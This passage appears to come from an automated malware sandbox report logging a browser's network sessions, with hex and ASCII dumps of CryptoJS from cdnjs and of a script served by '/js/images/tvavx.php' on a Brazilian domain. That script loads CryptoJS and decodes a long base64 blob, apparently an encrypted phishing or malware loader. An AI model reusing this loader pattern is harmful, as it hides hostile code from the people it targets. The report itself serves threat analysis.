                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DEE47goqnWWXlqzwgBxVZyXLrK%2FEC7p07ysOwfl0XzzQgq4kHRVfbHnF2JfFIWGQJeMjRC4ng24Ih%2FN4iIA5GhWC2L4a57hR7nyi7243p%2F5AObHR37hKy5Iy%2FW0TYeF%2FYlaywL%2BE"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                Strict-Transport-Security: max-age=15780000
                                                                Server: cloudflare
                                                                CF-RAY: 8b9dfa8aac536a58-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:03:30 UTC405INData Raw: 37 62 65 64 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                Data Ascii: 7bed!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                2024-08-27 18:03:30 UTC1369INData Raw: 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74
                                                                Data Ascii: o&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==t
                                                                2024-08-27 18:03:30 UTC1369INData Raw: 61 72 20 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a
                                                                Data Ascii: ar o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:
                                                                2024-08-27 18:03:30 UTC1369INData Raw: 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f
                                                                Data Ascii: arse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._do
                                                                2024-08-27 18:03:30 UTC1369INData Raw: 2c 32 35 35 3d 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d
                                                                Data Ascii: ,255===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]
                                                                2024-08-27 18:03:30 UTC1369INData Raw: 30 39 32 2b 28 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29
                                                                Data Ascii: 092+(e[4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)
                                                                2024-08-27 18:03:30 UTC1369INData Raw: 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32
                                                                Data Ascii: >>>6-o%4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=42
                                                                2024-08-27 18:03:30 UTC1369INData Raw: 29 2c 53 3d 41 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b
                                                                Data Ascii: ),S=A(S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[
                                                                2024-08-27 18:03:30 UTC1369INData Raw: 69 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72
                                                                Data Ascii: i.clone.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;retur
                                                                2024-08-27 18:03:30 UTC1369INData Raw: 28 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72
                                                                Data Ascii: (o),function(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.164972945.164.92.1884433684C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:30 UTC545OUTGET /js/images/tvavx.php?1-44636c424373417744415042487958332f735a466b5979684a6144513939655850637a6d4f6476586e4a476f4b454d68563149674d716973446c487154376c5a4362385062384e6a68355948316a642f-dauber HTTP/1.1
                                                                Host: www.estampariaimagemeacao.com.br
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:03:31 UTC182INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:03:30 GMT
                                                                Server: Apache
                                                                Access-Control-Allow-Origin: *
                                                                Connection: close
                                                                Transfer-Encoding: chunked
                                                                Content-Type: text/javascript
                                                                2024-08-27 18:03:31 UTC8010INData Raw: 33 65 33 66 0d 0a 76 61 72 20 69 73 73 75 65 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 69 73 73 75 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 69 73 73 75 65 29 3b 0d 0a 69 73 73 75 65 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 76 61 72 20 7b 61 2c 62 2c 63 2c 64 7d 20 3d 20 4a 53 4f 4e 2e 70 61 72 73 65 28 61 74 6f 62 28 22 65 79 4a 68 49 6a 6f 69 61 45 6f 34
                                                                Data Ascii: 3e3fvar issue= document.createElement("script");issue.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(issue);issue.onload=function(){var {a,b,c,d} = JSON.parse(atob("eyJhIjoiaEo4
                                                                2024-08-27 18:03:31 UTC7931INData Raw: 72 61 32 56 79 51 6b 78 53 53 56 77 76 64 6a 55 79 55 31 5a 59 62 58 6c 75 5a 55 78 7a 52 31 64 44 4b 32 68 70 57 57 68 71 65 56 4a 7a 63 47 4e 43 57 45 77 35 4f 44 4a 4f 52 6a 4a 34 64 57 78 7a 52 56 59 79 51 6d 59 32 52 57 39 33 61 6e 70 6c 62 6e 63 72 62 7a 4a 6a 4f 56 52 4e 51 54 64 55 56 45 35 55 56 44 56 55 64 57 4e 58 4f 47 6c 50 64 6c 49 33 4e 33 56 43 56 6d 5a 4c 53 47 70 78 4e 55 52 46 4d 6e 4e 33 5a 32 59 30 55 33 70 57 51 54 52 6f 53 6a 51 72 58 43 39 78 4b 30 4a 34 57 45 59 35 55 6d 78 52 62 45 46 4f 54 47 6f 72 52 33 5a 30 61 57 52 30 62 30 4a 74 61 6d 64 32 4d 56 68 61 64 30 39 4a 4d 45 68 6b 61 6d 35 79 52 55 5a 49 5a 31 64 6f 64 30 78 6d 51 6a 68 73 61 31 6c 72 55 6c 68 6e 54 6d 46 69 56 6e 70 5a 54 6e 5a 54 53 55 56 30 57 6d 6c 57 64 56
                                                                Data Ascii: ra2VyQkxSSVwvdjUyU1ZYbXluZUxzR1dDK2hpWWhqeVJzcGNCWEw5ODJORjJ4dWxzRVYyQmY2RW93anplbncrbzJjOVRNQTdUVE5UVDVUdWNXOGlPdlI3N3VCVmZLSGpxNURFMnN3Z2Y0U3pWQTRoSjQrXC9xK0J4WEY5UmxRbEFOTGorR3Z0aWR0b0Jtamd2MVhad09JMEhkam5yRUZIZ1dod0xmQjhsa1lrUlhnTmFiVnpZTnZTSUV0WmlWdV
                                                                2024-08-27 18:03:31 UTC2INData Raw: 0d 0a
                                                                Data Ascii:
                                                                2024-08-27 18:03:31 UTC8192INData Raw: 31 66 34 30 0d 0a 4e 57 65 45 35 74 61 6d 35 7a 54 31 77 76 59 57 52 6f 56 6d 64 4b 4f 47 38 72 53 6e 68 56 55 6e 6c 4c 5a 44 6b 31 63 6e 64 73 57 6d 68 42 5a 46 6b 35 53 48 64 31 55 6a 56 30 64 45 68 53 61 57 31 4c 4d 6a 51 7a 4f 54 4a 6f 4d 57 77 35 63 56 4e 6b 4e 33 46 75 63 58 5a 43 63 54 45 33 51 7a 64 71 65 47 52 44 58 43 39 48 4d 6a 5a 63 4c 32 64 6a 4f 58 68 32 59 31 64 5a 56 33 70 48 4f 57 68 45 65 45 70 7a 56 6b 64 50 62 6d 52 34 65 45 4a 57 52 54 52 6e 64 33 46 31 5a 57 6c 73 62 33 68 74 5a 33 4e 77 54 6a 56 50 63 30 35 6f 58 43 39 6e 4f 47 63 35 61 7a 55 34 4e 6a 68 46 63 47 45 35 55 32 46 59 63 31 41 72 59 6b 6c 58 59 6a 45 31 63 45 39 6b 54 6d 6c 48 64 54 4d 34 63 56 68 4d 51 58 68 63 4c 30 74 36 5a 30 35 59 4e 54 42 4b 56 58 70 42 4e 45 5a
                                                                Data Ascii: 1f40NWeE5tam5zT1wvYWRoVmdKOG8rSnhVUnlLZDk1cndsWmhBZFk5SHd1UjV0dEhSaW1LMjQzOTJoMWw5cVNkN3FucXZCcTE3QzdqeGRDXC9HMjZcL2djOXh2Y1dZV3pHOWhEeEpzVkdPbmR4eEJWRTRnd3F1ZWlsb3htZ3NwTjVPc05oXC9nOGc5azU4NjhFcGE5U2FYc1ArYklXYjE1cE9kTmlHdTM4cVhMQXhcL0t6Z05YNTBKVXpBNEZ
                                                                2024-08-27 18:03:31 UTC7822INData Raw: 61 46 52 4d 61 6d 74 31 64 46 42 6a 52 7a 52 33 61 7a 6b 79 55 46 56 72 4d 30 64 5a 62 6b 4a 70 4d 57 6c 57 4d 30 52 51 59 55 68 4a 5a 56 5a 4d 64 55 52 6f 56 57 6c 44 5a 55 68 51 64 48 6f 30 54 45 6c 6e 56 6c 5a 44 65 54 4d 77 4e 6d 4e 75 62 30 64 42 4d 48 70 68 61 54 46 52 57 56 55 7a 64 46 51 30 62 6e 45 77 4f 54 6c 58 4f 57 5a 7a 64 55 31 44 5a 6e 67 78 64 6a 45 78 57 55 64 43 57 44 52 56 52 57 6f 72 57 6d 67 35 5a 47 46 6c 64 32 35 70 63 6d 35 4b 65 56 49 72 55 6b 77 35 63 6a 55 34 55 6e 6c 55 53 44 64 4a 5a 57 49 77 4e 6e 68 73 4e 33 6c 4b 65 54 56 61 4e 45 78 68 65 6e 6c 50 61 54 4d 32 62 58 5a 4e 53 55 4e 43 53 6c 70 56 59 6a 52 45 54 45 31 32 5a 56 67 31 56 48 52 6a 5a 6d 35 49 4e 6c 59 31 54 6a 4a 56 64 44 56 42 5a 6e 46 53 4d 58 52 56 4d 6a 68
                                                                Data Ascii: aFRMamt1dFBjRzR3azkyUFVrM0dZbkJpMWlWM0RQYUhJZVZMdURoVWlDZUhQdHo0TElnVlZDeTMwNmNub0dBMHphaTFRWVUzdFQ0bnEwOTlXOWZzdU1DZngxdjExWUdCWDRVRWorWmg5ZGFld25pcm5KeVIrUkw5cjU4UnlUSDdJZWIwNnhsN3lKeTVaNExhenlPaTM2bXZNSUNCSlpVYjRETE12ZVg1VHRjZm5INlY1TjJVdDVBZnFSMXRVMjh
                                                                2024-08-27 18:03:31 UTC2INData Raw: 0d 0a
                                                                Data Ascii:
                                                                2024-08-27 18:03:31 UTC1449INData Raw: 35 61 32 0d 0a 59 79 4d 45 70 46 56 30 38 32 4d 47 6c 6f 62 6b 6f 77 55 45 52 72 54 58 64 42 65 45 6c 58 52 47 38 72 59 31 4a 7a 4e 47 38 32 57 43 74 4e 59 79 74 57 56 6a 64 58 59 54 68 54 54 6c 70 63 4c 30 38 35 54 55 56 52 5a 48 4e 4e 62 31 68 52 5a 6d 31 57 64 58 64 61 4e 54 64 50 61 33 64 51 63 31 77 76 5a 55 63 78 59 57 56 79 51 55 4e 53 54 45 70 61 54 6d 70 4a 53 6c 5a 55 61 45 52 4b 61 45 70 54 52 48 63 77 64 45 46 35 5a 6b 64 4d 54 55 74 4b 54 6e 67 7a 63 32 52 61 52 6d 74 54 5a 48 56 4c 54 33 56 4f 4e 6d 70 6f 57 48 67 79 4e 7a 4a 33 59 6e 42 76 54 56 42 42 62 45 73 35 55 54 68 72 56 57 35 52 65 44 4a 51 52 6a 6c 69 4e 54 4d 31 53 55 35 46 65 54 5a 69 61 7a 4a 56 63 48 52 5a 54 47 4e 71 64 6c 41 30 4d 47 46 45 64 55 6c 6d 62 6d 4e 78 4d 6e 45 79
                                                                Data Ascii: 5a2YyMEpFV082MGlobkowUERrTXdBeElXRG8rY1JzNG82WCtNYytWVjdXYThTTlpcL085TUVRZHNNb1hRZm1WdXdaNTdPa3dQc1wvZUcxYWVyQUNSTEpaTmpJSlZUaERKaEpTRHcwdEF5ZkdMTUtKTngzc2RaRmtTZHVLT3VONmpoWHgyNzJ3YnBvTVBBbEs5UThrVW5ReDJQRjliNTM1SU5FeTZiazJVcHRZTGNqdlA0MGFEdUlmbmNxMnEy
                                                                2024-08-27 18:03:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.1649730104.17.24.144433684C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:31 UTC386OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                Host: cdnjs.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:03:31 UTC958INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:03:31 GMT
                                                                Content-Type: application/javascript; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=30672000
                                                                ETag: W/"5eb03e2d-bb78"
                                                                Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                cf-cdnjs-via: cfworker/kv
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Timing-Allow-Origin: *
                                                                X-Content-Type-Options: nosniff
                                                                CF-Cache-Status: HIT
                                                                Age: 425312
                                                                Expires: Sun, 17 Aug 2025 18:03:31 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hcWmvUHrKLByRfchVtgM38WpcqJ5ulauuE2Fw60LKrikdhWH29DRm8ONPx7hf3gJRJqrE4eOg%2BpLR1%2BPxAgAqCrdtB1LwuKkBUlWMz6%2FOIg89F7tdTzB7uobg9VIfSZbu4HJhGAD"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                Strict-Transport-Security: max-age=15780000
                                                                Server: cloudflare
                                                                CF-RAY: 8b9dfa8fcee443a4-EWR
                                                                alt-svc: h3=":443"; ma=86400
